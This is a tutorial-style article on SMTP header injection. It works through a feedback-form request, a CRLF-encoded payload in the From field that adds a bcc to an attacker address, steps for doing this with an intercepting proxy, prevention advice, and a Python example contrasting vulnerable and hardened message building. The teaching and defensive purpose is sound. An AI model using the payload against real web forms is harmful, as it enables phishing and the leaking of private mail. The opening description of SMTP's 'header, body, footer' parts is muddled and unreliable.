What is SMTP Header Injection?

Author: hacking-hat

SMTP (Simple Mail Transfer Protocol) handles the sending, receiving, and relaying of email on the server. It has three main parts that come into play in SMTP header injection, which is discussed later:

  • Header: This is the part where the normal SMTP command ends.
  • Body: This is where we try to inject the malicious input.
  • Footer: The footer contains all the malicious input.

[Figure: SMTP Communication Between Server and User]

SMTP Header Injection:

SMTP header injection is a technique an attacker uses to exploit the mail and web servers of an application when input is not carefully sanitized. It allows the attacker to send emails to other users, and those emails may carry phishing content or dangerous scripts. Because emails sometimes contain private information, it can be a disaster for a company if an unauthorized person is able to read that information.

For example, consider an application that uses requests of the following form to submit feedback:

POST /feedback.php HTTP/1.1
Host: geeksforgeeks.com
Content-Length: 56

From=username@gmail.com&Subject=Site+feedback&Message=love+geeksforgeeks

After the input is submitted, the web application performs an SMTP transaction using the following commands:

MAIL FROM:username@gmail.com
RCPT TO:feedback@geeksforgeeks.com
DATA
From: username@gmail.com
To:feedback@geeksforgeeks.com
Subject:Site feedback

love geeksforgeeks
.

NOTE: The “.” on its own line after the message marks the end of that particular message.

  • MAIL FROM: This command sets the sender.
  • RCPT TO: This command contains the recipient email addresses.
  • DATA: This command contains the email data.

Exploiting the SMTP Header to Perform SMTP Header Injection:

  • Step 1: Fill in the details in the feedback form as shown in the SMTP example above.
  • Step 2: Intercept the request you made with an intercepting tool such as Burp Suite.
  • Step 3: Inject the malicious input into the captured request.

Example:      

POST /feedback.php HTTP/1.1
Host: geeksforgeeks.com
Content-Length: 56

From=username@gmail.com%0d%0abcc:attackername%40attacker.com&Subject=Site+feedback&Message=love+geeksforgeeks

Note: “%0a” is the URL-encoded form of the newline character “\n”, and “%0d” is the encoded form of the carriage return “\r”.

  • Step 4: Now send the injected request as shown in the box above.

Prevention:

  • Use allow-list (white list) input validation to filter the input.
  • Use a regular expression to detect any newline character, whether it is encoded or not, and block the input if one is found.
  • Always use an email library that prevents these types of attacks automatically.
  • Treat every input as malicious; you can’t trust any user. Hence, test every possible input.
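
The prevention points above, shown as an added example that is not code from the original article: the same feedback form is handled once by naive string concatenation and once with newline rejection, an allow-list check and Python's standard email library. The function names (parse_form, build_naive, header_names, build_safe) are hypothetical, and the choice of Python is an assumption, since the article does not show the application's server-side code.

```python
import re
from email.message import EmailMessage
from urllib.parse import parse_qs

# Constructed request bodies: the two feedback requests shown on this page.
BENIGN = "From=username@gmail.com&Subject=Site+feedback&Message=love+geeksforgeeks"
INJECTED = ("From=username@gmail.com%0d%0abcc:attackername%40attacker.com"
            "&Subject=Site+feedback&Message=love+geeksforgeeks")

# Allow-list for a plain address: no whitespace, colons or control characters.
ADDR_RE = re.compile(r"[A-Za-z0-9._+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Raw CR/LF, plus forms that are still percent-encoded after one decode.
NEWLINE_RE = re.compile(r"[\r\n]|%0[ad]", re.IGNORECASE)

def parse_form(body):
    """Decode the form body once, as a web framework would."""
    return {name: values[0] for name, values in parse_qs(body).items()}

def build_naive(form):
    """Vulnerable pattern: header block built by string concatenation."""
    return (f"From: {form['From']}\r\n"
            "To: feedback@geeksforgeeks.com\r\n"
            f"Subject: {form['Subject']}\r\n\r\n"
            f"{form['Message']}\r\n")

def header_names(raw):
    """Header names a mail server would read from the raw message."""
    head = raw.split("\r\n\r\n", 1)[0]
    return [line.split(":", 1)[0].strip().lower() for line in head.split("\r\n")]

def build_safe(form):
    """Hardened pattern: validate decoded values, then use the email library."""
    for field in ("From", "Subject"):
        if NEWLINE_RE.search(form[field]):
            raise ValueError(f"newline character in {field}")
    if not ADDR_RE.fullmatch(form["From"]):
        raise ValueError("From is not a plain email address")
    msg = EmailMessage()
    msg["From"] = form["From"]
    msg["To"] = "feedback@geeksforgeeks.com"
    msg["Subject"] = form["Subject"]
    msg.set_content(form["Message"])
    return msg

if __name__ == "__main__":
    print(header_names(build_naive(parse_form(INJECTED))))
    print(build_safe(parse_form(BENIGN)))
```

With the injected body, the naive builder produces a message whose header block contains an extra bcc line, while build_safe raises ValueError before any message is created.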